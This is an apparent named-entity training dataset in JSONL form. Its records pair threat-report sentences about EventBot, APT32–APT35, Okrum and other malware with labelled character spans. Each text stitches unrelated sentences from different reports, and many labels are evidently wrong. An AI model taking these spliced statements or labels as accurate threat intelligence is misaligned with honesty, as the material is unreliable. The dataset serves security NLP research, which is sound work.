{"text": "Those targeted include Paypal Business , Revolut , Barclays , UniCredit , CapitalOne UK , HSBC UK , Santander UK , TransferWise , Coinbase , paysafecard , and many more . Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S . Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia .", "spans": [{"start": 23, "end": 38, "label": "System"}, {"start": 41, "end": 48, "label": "System"}, {"start": 51, "end": 59, "label": "System"}, {"start": 62, "end": 71, "label": "System"}, {"start": 74, "end": 87, "label": "System"}, {"start": 90, "end": 97, "label": "System"}, {"start": 100, "end": 112, "label": "System"}, {"start": 115, "end": 127, "label": "System"}, {"start": 130, "end": 138, "label": "System"}, {"start": 141, "end": 152, "label": "System"}, {"start": 199, "end": 208, "label": "Malware"}, {"start": 326, "end": 336, "label": "Organization"}, {"start": 339, "end": 345, "label": "Organization"}, {"start": 352, "end": 370, "label": "Organization"}]}
{"text": "The full list of banking applications targeted is included in the appendix . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 . At a high level , Retriever is a .NET downloader that downloads secondary payloads from servers associated with Magic Hound .", "spans": [{"start": 131, "end": 140, "label": "Malware"}, {"start": 299, "end": 308, "label": "Malware"}, {"start": 314, "end": 329, "label": "Malware"}]}
{"text": "ABUSE OF ACCESSIBILITY SERVICES EventBot abuses the accessibility services of Android devices for the majority of its activity . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe . For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer .", "spans": [{"start": 32, "end": 40, "label": "Malware"}, {"start": 78, "end": 85, "label": "System"}, {"start": 129, "end": 141, "label": "Malware"}, {"start": 198, "end": 208, "label": "Malware"}, {"start": 239, "end": 252, "label": "Malware"}, {"start": 264, "end": 328, "label": "Indicator"}, {"start": 390, "end": 413, "label": "Indicator"}, {"start": 438, "end": 460, "label": "Malware"}]}
{"text": "Accessibility features are typically used to help users with disabilities by giving the device the ability to write into input fields , auto-generate permissions , perform gestures for the user , etc . Today , this malware is still actively being used against the Philippines . M-Trends 2018 can arm security teams with the knowledge they need to defend against today 's most often used cyber attacks , as well as lesser seen and emerging threats .", "spans": [{"start": 215, "end": 222, "label": "Malware"}, {"start": 278, "end": 286, "label": "Organization"}]}
{"text": "However , when used maliciously , accessibility features can be used to exploit legitimate services for malicious purposes , like with EventBot . Xagent is the original filename Xagent.exe whereas seems to be the version of the worm . FireEye tracks thousands of threat actors , but pays special attention to state-sponsored attackers who carry out advanced persistent threat ( APT ) attacks .", "spans": [{"start": 135, "end": 143, "label": "Malware"}, {"start": 146, "end": 152, "label": "Malware"}, {"start": 178, "end": 188, "label": "Malware"}, {"start": 228, "end": 232, "label": "Malware"}, {"start": 235, "end": 242, "label": "Organization"}, {"start": 270, "end": 276, "label": "Organization"}, {"start": 325, "end": 334, "label": "Organization"}]}
{"text": "EventBot uses multiple methods to exploit accessibility events for webinjects and other information stealing purposes . Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 150, "end": 157, "label": "Malware"}, {"start": 201, "end": 217, "label": "Malware"}, {"start": 261, "end": 277, "label": "Malware"}, {"start": 299, "end": 308, "label": "Organization"}, {"start": 398, "end": 403, "label": "Organization"}, {"start": 424, "end": 440, "label": "Organization"}, {"start": 456, "end": 476, "label": "Organization"}, {"start": 507, "end": 526, "label": "Organization"}, {"start": 529, "end": 540, "label": "Organization"}, {"start": 558, "end": 568, "label": "Organization"}]}
{"text": "DATA GATHERING Getting a list of all installed applications : Once EventBot is installed on the target machine , it lists all the applications on the target machine and sends them to the C2 . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros .", "spans": [{"start": 67, "end": 75, "label": "Malware"}, {"start": 224, "end": 237, "label": "Malware"}, {"start": 330, "end": 339, "label": "Malware"}, {"start": 369, "end": 374, "label": "Organization"}, {"start": 404, "end": 410, "label": "System"}, {"start": 416, "end": 441, "label": "Indicator"}]}
{"text": "Device information : EventBot queries for device information like OS , model , etc , and also sends that to the C2 . We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 . Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with connections to foreign investors .", "spans": [{"start": 21, "end": 29, "label": "Malware"}, {"start": 176, "end": 190, "label": "Malware"}, {"start": 210, "end": 227, "label": "Malware"}, {"start": 285, "end": 290, "label": "Organization"}, {"start": 304, "end": 320, "label": "Organization"}, {"start": 325, "end": 363, "label": "Organization"}]}
{"text": "EventBot infected device to be sent to the C Information gathered about the infected device to be sent to the C2 . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 169, "end": 182, "label": "Malware"}, {"start": 199, "end": 217, "label": "Malware"}, {"start": 287, "end": 292, "label": "Organization"}, {"start": 313, "end": 329, "label": "Organization"}, {"start": 345, "end": 365, "label": "Organization"}, {"start": 374, "end": 385, "label": "Organization"}]}
{"text": "Data encryption : In the initial version of EventBot , the data being exfiltrated is encrypted using Base64 and RC4 . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor . FireEye asesses that APT32 actors may be aligned with the national interests of Vietnam .", "spans": [{"start": 44, "end": 52, "label": "Malware"}, {"start": 169, "end": 185, "label": "Malware"}, {"start": 192, "end": 200, "label": "Malware"}, {"start": 217, "end": 224, "label": "Organization"}, {"start": 238, "end": 250, "label": "Organization"}]}
{"text": "In later versions , another encryption layer is added using Curve25519 encryption . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 . APT32 poses a threat to companies doing business or preparing to invest in Vietnam .", "spans": [{"start": 97, "end": 101, "label": "Organization"}, {"start": 114, "end": 119, "label": "Malware"}, {"start": 262, "end": 267, "label": "Organization"}]}
{"text": "All of the most recent versions of EventBot contain a ChaCha20 library that can improve performance when compared to other algorithms like RC4 and AES . According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia . We believe recent activity targeting private interests in Vietnam suggests that APT32 poses a threat to companies doing business or preparing to invest in the country .", "spans": [{"start": 35, "end": 43, "label": "Malware"}, {"start": 54, "end": 62, "label": "System"}, {"start": 182, "end": 187, "label": "Malware"}, {"start": 427, "end": 432, "label": "Organization"}]}
{"text": "This implies that the authors are actively working to optimize EventBot over time . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor .", "spans": [{"start": 63, "end": 71, "label": "Malware"}, {"start": 136, "end": 141, "label": "Malware"}, {"start": 158, "end": 167, "label": "Malware"}, {"start": 336, "end": 344, "label": "Malware"}, {"start": 367, "end": 374, "label": "Malware"}]}
{"text": "SMS grabbing : EventBot has the ability to parse SMS messages by using the targeted device \u2019 s SDK version to parse them correctly . According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month . Additionally , there is evidence to suggest APT33 targeted Saudi Arabia .", "spans": [{"start": 15, "end": 23, "label": "Malware"}, {"start": 146, "end": 154, "label": "Organization"}, {"start": 237, "end": 243, "label": "Malware"}, {"start": 382, "end": 387, "label": "Organization"}]}
{"text": "EventBot parsing of grabbed SMS messages Parsing of grabbed SMS messages . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . APT33 often conducts spear-phishing operations using a built-in phishing module .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 142, "end": 152, "label": "Malware"}, {"start": 167, "end": 180, "label": "Malware"}, {"start": 210, "end": 215, "label": "Organization"}]}
{"text": "Webinjects : According to the bot \u2019 s configuration , if a webinject is set for a given application , it will be executed . If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets .", "spans": [{"start": 162, "end": 171, "label": "System"}, {"start": 174, "end": 176, "label": "Malware"}, {"start": 187, "end": 213, "label": "Malware"}, {"start": 313, "end": 318, "label": "Organization"}, {"start": 436, "end": 444, "label": "Organization"}, {"start": 449, "end": 459, "label": "Organization"}]}
{"text": "EventBot web injects execution method Web injects execution method by a pre-established configuration . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart . Although we have only observed APT33 use DROPSHOT to deliver TURNEDUP , we have identified multiple DROPSHOT samples in the wild that delivered wiper malware we call SHAPESHIFT .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 113, "end": 122, "label": "Malware"}, {"start": 149, "end": 166, "label": "Malware"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 271, "end": 279, "label": "Malware"}, {"start": 330, "end": 346, "label": "Malware"}, {"start": 396, "end": 406, "label": "Malware"}]}
{"text": "BOT UPDATES EventBot has a long method called parseCommand that can update EventBot \u2019 s configuration XML files , located in the shared preferences folder on the device . Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources . The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files .", "spans": [{"start": 12, "end": 20, "label": "Malware"}, {"start": 75, "end": 83, "label": "Malware"}, {"start": 176, "end": 183, "label": "Malware"}, {"start": 317, "end": 333, "label": "Malware"}]}
{"text": "EventBot Dropped XML configuration files Dropped XML configuration files on the device . Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . Ties to SHAPESHIFT suggest that APT33 may engage in destructive operations or shares tools or development resources with an Iranian threat group that conducts destructive operations .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 122, "end": 131, "label": "Malware"}, {"start": 202, "end": 214, "label": "Malware"}, {"start": 259, "end": 269, "label": "Malware"}, {"start": 283, "end": 288, "label": "Organization"}]}
{"text": "EventBot uses this function to update its C2s , the configuration of webinjects , etc . Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . In a recent attack , APT33 sent spear-phishing emails to workers in the aviation industry .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 88, "end": 97, "label": "Malware"}, {"start": 257, "end": 261, "label": "Malware"}, {"start": 338, "end": 343, "label": "Organization"}, {"start": 364, "end": 370, "label": "System"}, {"start": 389, "end": 406, "label": "Organization"}]}
{"text": "The following code shows EventBot parsing instructions sent from the C2 . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . The HTA files contained job descriptions and links to job postings on popular employment websites .", "spans": [{"start": 25, "end": 33, "label": "Malware"}, {"start": 74, "end": 81, "label": "Malware"}, {"start": 93, "end": 109, "label": "Malware"}, {"start": 112, "end": 131, "label": "Malware"}, {"start": 134, "end": 148, "label": "Malware"}, {"start": 151, "end": 167, "label": "Malware"}, {"start": 170, "end": 181, "label": "Malware"}, {"start": 184, "end": 204, "label": "Malware"}, {"start": 207, "end": 214, "label": "Malware"}, {"start": 248, "end": 254, "label": "Malware"}, {"start": 272, "end": 281, "label": "Indicator"}]}
{"text": "Parsing of instructions by EventBot Parsing of instructions by the bot from the C2 . 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . Since at least 2014 , an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran .", "spans": [{"start": 27, "end": 35, "label": "Malware"}, {"start": 85, "end": 96, "label": "Malware"}, {"start": 114, "end": 127, "label": "Malware"}, {"start": 130, "end": 145, "label": "Malware"}, {"start": 148, "end": 161, "label": "Malware"}, {"start": 166, "end": 182, "label": "Malware"}, {"start": 387, "end": 394, "label": "Organization"}, {"start": 398, "end": 403, "label": "Organization"}]}
{"text": "UNIQUE FEATURES BY VERSION EventBot Version 0.0.0.1 RC4 and Base64 Packet Encryption EventBot RC4 and Base64 data decryption from the C2 RC4 and Base64 data decryption from the C2 . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . These emails included recruitment-themed lures and links to malicious HTML Application files .", "spans": [{"start": 27, "end": 35, "label": "Malware"}, {"start": 85, "end": 93, "label": "Malware"}, {"start": 187, "end": 193, "label": "Malware"}, {"start": 213, "end": 222, "label": "Malware"}, {"start": 254, "end": 269, "label": "Malware"}, {"start": 301, "end": 309, "label": "Malware"}, {"start": 438, "end": 444, "label": "System"}, {"start": 502, "end": 518, "label": "System"}]}
{"text": "As mentioned above , EventBot Version 0.0.0.1 sends a JSON object containing the Android package names of all the apps installed on the victim \u2019 s device alongside additional metadata , including the bot version , botnetID , and the reason this package is sent . The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . The OilRig group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries .", "spans": [{"start": 21, "end": 29, "label": "Malware"}, {"start": 81, "end": 88, "label": "System"}, {"start": 267, "end": 285, "label": "Malware"}, {"start": 334, "end": 343, "label": "Malware"}, {"start": 381, "end": 393, "label": "Organization"}, {"start": 455, "end": 464, "label": "Organization"}, {"start": 467, "end": 477, "label": "Organization"}, {"start": 480, "end": 486, "label": "Organization"}, {"start": 489, "end": 497, "label": "Organization"}, {"start": 500, "end": 518, "label": "Organization"}]}
{"text": "For this particular packet , the reason is registration of the bot . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . APT34 uses a mix of public and non-public tools .", "spans": [{"start": 135, "end": 140, "label": "System"}, {"start": 197, "end": 202, "label": "Organization"}, {"start": 238, "end": 243, "label": "Malware"}, {"start": 246, "end": 252, "label": "Malware"}, {"start": 255, "end": 261, "label": "Malware"}, {"start": 264, "end": 269, "label": "Malware"}, {"start": 272, "end": 278, "label": "Malware"}, {"start": 281, "end": 286, "label": "Organization"}, {"start": 301, "end": 328, "label": "Malware"}]}
{"text": "If the connection to the C2 fails , it will continue to retry until it is successful . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL . APT34 often uses compromised accounts to conduct spear-phishing operations .", "spans": [{"start": 108, "end": 114, "label": "Organization"}, {"start": 157, "end": 164, "label": "Malware"}, {"start": 302, "end": 306, "label": "Malware"}, {"start": 309, "end": 314, "label": "Organization"}, {"start": 326, "end": 346, "label": "Malware"}]}
{"text": "EventBot Logcat from the infected device Logcat from the infected device . Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 \u2014 the same date the first authenticated login to Visma\u2019s network was made using stolen credentials . APT33 leverages a mix of public and non-public tools and often conducts spear-phishing operations using a built-in phishing module from \" ALFA TEaM Shell \" , a publicly available web shell .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 75, "end": 87, "label": "Organization"}, {"start": 186, "end": 199, "label": "Malware"}, {"start": 230, "end": 242, "label": "Malware"}, {"start": 377, "end": 382, "label": "Organization"}, {"start": 402, "end": 429, "label": "Malware"}, {"start": 515, "end": 530, "label": "Malware"}, {"start": 537, "end": 565, "label": "Malware"}]}
{"text": "EVENTBOT VERSION 0.0.0.2 Dynamic Library Loading As of Version 0.0.0.2 , EventBot attempts to hide its main functionality from static analysis . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK . In July 2017 , FireEye observed APT34 targeting an organization in the Middle East using the POWRUNER PowerShell-based backdoor and the downloader BONDUPDATER .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 73, "end": 81, "label": "Malware"}, {"start": 145, "end": 150, "label": "Malware"}, {"start": 156, "end": 171, "label": "System"}, {"start": 236, "end": 244, "label": "Organization"}, {"start": 262, "end": 269, "label": "Organization"}, {"start": 279, "end": 284, "label": "Organization"}, {"start": 340, "end": 374, "label": "Malware"}, {"start": 394, "end": 405, "label": "Malware"}]}
{"text": "With Version 0.0.0.1 , there is a dedicated functions class where all main malicious activity happens and can be observed . Rapid7 reviewed malware discovered in the victim\u2019s environment and found implants that used Dropbox as the C2 . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": [{"start": 124, "end": 130, "label": "Organization"}, {"start": 216, "end": 223, "label": "Malware"}, {"start": 236, "end": 244, "label": "Malware"}, {"start": 277, "end": 285, "label": "Indicator"}, {"start": 301, "end": 314, "label": "Vulnerability"}]}
{"text": "Instead , in Version 0.0.0.2 , EventBot dynamically loads its main module . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": [{"start": 31, "end": 39, "label": "Malware"}, {"start": 222, "end": 228, "label": "Malware"}, {"start": 248, "end": 262, "label": "Vulnerability"}, {"start": 266, "end": 279, "label": "Vulnerability"}, {"start": 301, "end": 306, "label": "Organization"}, {"start": 321, "end": 337, "label": "System"}, {"start": 352, "end": 366, "label": "Vulnerability"}, {"start": 377, "end": 385, "label": "Malware"}, {"start": 390, "end": 401, "label": "Malware"}, {"start": 425, "end": 434, "label": "Organization"}]}
{"text": "EventBot loaded library Loaded library as seen in Logcat . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft\u2019s Equation Editor (EQNEDT32) . FireEye has identified APT35 operations dating back to 2014 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 111, "end": 120, "label": "Malware"}, {"start": 141, "end": 154, "label": "Vulnerability"}, {"start": 213, "end": 220, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}]}
{"text": "By browsing EventBot \u2019 s installation path on the device , we can see the library dropped in the app_dex folder . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . APT35 , also known as the Newscaster Team , is a threat group sponsored by the Iranian government that conducts long term , resource-intensive operations to collect strategic intelligence .", "spans": [{"start": 12, "end": 20, "label": "Malware"}, {"start": 114, "end": 121, "label": "Organization"}, {"start": 200, "end": 203, "label": "Malware"}, {"start": 231, "end": 244, "label": "Vulnerability"}, {"start": 247, "end": 252, "label": "Organization"}, {"start": 273, "end": 288, "label": "Organization"}]}
{"text": "EventBot loaded library The loaded library dropped on the device . The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 . APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. and the Middle East .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 99, "end": 102, "label": "Malware"}, {"start": 262, "end": 265, "label": "Malware"}, {"start": 293, "end": 298, "label": "Organization"}, {"start": 317, "end": 325, "label": "Organization"}, {"start": 328, "end": 338, "label": "Organization"}, {"start": 343, "end": 353, "label": "Organization"}, {"start": 356, "end": 361, "label": "Organization"}, {"start": 364, "end": 370, "label": "Organization"}, {"start": 373, "end": 384, "label": "Organization"}, {"start": 387, "end": 404, "label": "Organization"}, {"start": 409, "end": 435, "label": "Organization"}]}
{"text": "The code to load the main module dynamically can also be seen statically . Upon decrypting and executing , it drops two additional files wsc_proxy.exe (legitimate Avast executable) and a malicious DLL wsc.dll in the %TEMP% folder . APT35 has historically used unsophisticated tools like those listed below in Figure 3 .", "spans": [{"start": 137, "end": 150, "label": "Malware"}, {"start": 201, "end": 208, "label": "Malware"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 260, "end": 281, "label": "Malware"}]}
{"text": "The malicious library is loaded from Eventbot \u2019 s assets that contain a font file called default.ttf which is actually the hidden library and then decoded using RC4 . However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit (CVE-2018-0798) . APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": [{"start": 37, "end": 45, "label": "Malware"}, {"start": 89, "end": 100, "label": "Indicator"}, {"start": 205, "end": 207, "label": "Organization"}, {"start": 271, "end": 279, "label": "Malware"}, {"start": 353, "end": 358, "label": "Organization"}, {"start": 405, "end": 413, "label": "Organization"}, {"start": 416, "end": 426, "label": "Organization"}, {"start": 431, "end": 451, "label": "Organization"}, {"start": 454, "end": 467, "label": "Organization"}, {"start": 475, "end": 480, "label": "Organization"}, {"start": 483, "end": 489, "label": "Organization"}, {"start": 494, "end": 517, "label": "Organization"}, {"start": 520, "end": 523, "label": "Organization"}, {"start": 532, "end": 543, "label": "Organization"}, {"start": 546, "end": 563, "label": "Organization"}, {"start": 568, "end": 594, "label": "Organization"}]}
{"text": "EventBot method responsible for the library loading The method responsible for the library loading . In addition , a current ANY.RUN playback of our observed Elise infection is also available . Many of the fake personas utilized by APT35 claimed to be part of news organizations , which led to APT35 being referred to as the Newscaster Team .", "spans": [{"start": 125, "end": 132, "label": "Malware"}, {"start": 158, "end": 163, "label": "Malware"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 260, "end": 278, "label": "Organization"}, {"start": 294, "end": 299, "label": "Organization"}, {"start": 325, "end": 340, "label": "Organization"}]}
{"text": "EventBot has the ability to update its library or potentially even download a second library when given a command from the C2 . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a Cyber Espionage operation to collect information from defense , aerospace and petrochemical organizations .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 194, "end": 208, "label": "Vulnerability"}, {"start": 275, "end": 289, "label": "Malware"}, {"start": 320, "end": 332, "label": "Malware"}, {"start": 465, "end": 472, "label": "Organization"}, {"start": 483, "end": 488, "label": "Organization"}, {"start": 561, "end": 568, "label": "Organization"}, {"start": 571, "end": 580, "label": "Organization"}, {"start": 585, "end": 612, "label": "Organization"}]}
{"text": "An updated library name is generated by calculating the md5sum of several device properties , while concatenating the build model twice in case of an update to the library . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity . Since at least 2013 , the Iranian threat group FireEye tracks as APT33 has carried out a Cyber Espionage operation to collect information from defense , aerospace and petrochemical organizations .", "spans": [{"start": 261, "end": 274, "label": "Vulnerability"}, {"start": 292, "end": 317, "label": "Malware"}, {"start": 320, "end": 334, "label": "Malware"}, {"start": 433, "end": 440, "label": "Organization"}, {"start": 451, "end": 456, "label": "Organization"}, {"start": 529, "end": 536, "label": "Organization"}, {"start": 539, "end": 548, "label": "Organization"}, {"start": 553, "end": 580, "label": "Organization"}]}
{"text": "EventBot Updated library naming convention EventBot New library naming convention . The well-crafted and socially engineered malicious documents then become the \ufb01rst stage of a long and mainly \ufb01leless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group . In early 2017 , Mandiant responded to an incident involving APT35 targeting an energy company .", "spans": [{"start": 43, "end": 51, "label": "Malware"}, {"start": 242, "end": 252, "label": "Malware"}, {"start": 267, "end": 286, "label": "Malware"}, {"start": 295, "end": 307, "label": "Organization"}, {"start": 326, "end": 334, "label": "Organization"}, {"start": 370, "end": 375, "label": "Organization"}, {"start": 389, "end": 403, "label": "Organization"}]}
{"text": "Data Encryption The Curve25519 encryption algorithm was implemented as of EventBot Version 0.0.0.2 . This powerful backdoor can receive commands from the attackers , enabling it to ex\ufb01ltrate \ufb01les from the system it is running on , execute additional scripts , delete \ufb01les , and more . The attacker used a spear-phishing email containing a link to a fake resume hosted on a legitimate website that had been compromised .", "spans": [{"start": 74, "end": 82, "label": "Malware"}, {"start": 115, "end": 123, "label": "Malware"}, {"start": 181, "end": 195, "label": "Malware"}, {"start": 231, "end": 257, "label": "Malware"}, {"start": 260, "end": 271, "label": "Malware"}, {"start": 289, "end": 297, "label": "Organization"}]}
{"text": "This encryption algorithm is an extra security layer for communicating with the C2 , an improvement over the previous version of a plain RC4 encryption . If the macros in SPK KANUN DE\u011e\u0130\u015e\u0130KL\u0130\u011e\u0130 G\u0130B G\u00d6R\u00dc\u015e\u00dc.doc\u201d are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe\u201d . APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host .", "spans": [{"start": 171, "end": 180, "label": "Malware"}, {"start": 305, "end": 318, "label": "Malware"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 356, "end": 371, "label": "Malware"}]}
{"text": "When reviewing the decrypted packet , it \u2019 s clear it has the same content as previous versions . INF \ufb01les have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll . They then proceeded to log directly into the VPN using the credentials of the compromised user .", "spans": [{"start": 98, "end": 106, "label": "System"}, {"start": 137, "end": 147, "label": "Organization"}, {"start": 184, "end": 195, "label": "System"}, {"start": 204, "end": 217, "label": "System"}, {"start": 265, "end": 268, "label": "System"}, {"start": 279, "end": 314, "label": "Malware"}]}
{"text": "EventBot decryption of packets from the C2 Decryption of packets from the C2 using Curve25519 . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . The resume contained the PupyRAT backdoor , which communicated with known APT35 infrastructure .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 119, "end": 128, "label": "Malware"}, {"start": 165, "end": 175, "label": "Malware"}, {"start": 234, "end": 250, "label": "Malware"}, {"start": 283, "end": 288, "label": "Organization"}]}
{"text": "EVENTBOT VERSION 0.3.0.1 Additional Assets Based on Country / Region EventBot-23aEventBot Spanish and Italian Images in Spanish and Italian added in version 0.3.0.1 . We assume that RunPow stands for run PowerShell , \u201d and triggers the PowerShell code embedded inside the .dll file . Once connected to the VPN , APT35 focused on stealing domain credentials from a Microsoft Active Directory Domain Controller to allow them to authenticate to the single-factor VPN and Office 365 instance .", "spans": [{"start": 204, "end": 214, "label": "Malware"}, {"start": 272, "end": 281, "label": "Malware"}, {"start": 306, "end": 309, "label": "System"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 364, "end": 373, "label": "Organization"}, {"start": 460, "end": 463, "label": "System"}]}
{"text": "Version 0.3.0.1 includes Italian and Spanish language compatibility within the resources section . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents . While having access to the organization 's environment , the Magic Hound targeted data related to entities in the Middle East .", "spans": [{"start": 140, "end": 148, "label": "Malware"}]}
{"text": "Presumably , this was done to make the app seem more credible to targeted users in different countries . This includes Python scripts . Mandiant has previously observed targeted attackers stealing email , but few threat actors have been as successful at this as APT35 .", "spans": [{"start": 136, "end": 144, "label": "Organization"}, {"start": 178, "end": 187, "label": "Organization"}, {"start": 197, "end": 202, "label": "System"}, {"start": 220, "end": 226, "label": "Organization"}, {"start": 262, "end": 267, "label": "Organization"}]}
{"text": "Grabbing the Screen PIN with Support for Samsung Devices Version 0.3.0.1 added an ~800 line long method called grabScreenPin , which uses accessibility features to track pin code changes in the device \u2019 s settings . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll\u201d , Ext_server_extapi.x64.dll\u201d , and Ext_server_espia.x64.dll\u201d extensions . The campaigns delivered PupyRAT , an open-source cross-platform remote access trojan ( RAT ) .", "spans": [{"start": 41, "end": 48, "label": "Organization"}, {"start": 230, "end": 251, "label": "Malware"}, {"start": 260, "end": 286, "label": "Malware"}, {"start": 289, "end": 315, "label": "Malware"}, {"start": 322, "end": 347, "label": "Malware"}, {"start": 385, "end": 392, "label": "Malware"}, {"start": 425, "end": 445, "label": "Malware"}, {"start": 448, "end": 451, "label": "Malware"}]}
{"text": "It listens to events like TYPE_VIEW_TEXT_CHANGED . However , Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client outlook.live.com\u201d as well as attachments arriving through the Outlook desktop application . Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks .", "spans": [{"start": 61, "end": 70, "label": "Organization"}, {"start": 170, "end": 187, "label": "Malware"}, {"start": 275, "end": 280, "label": "Organization"}, {"start": 330, "end": 350, "label": "Organization"}]}
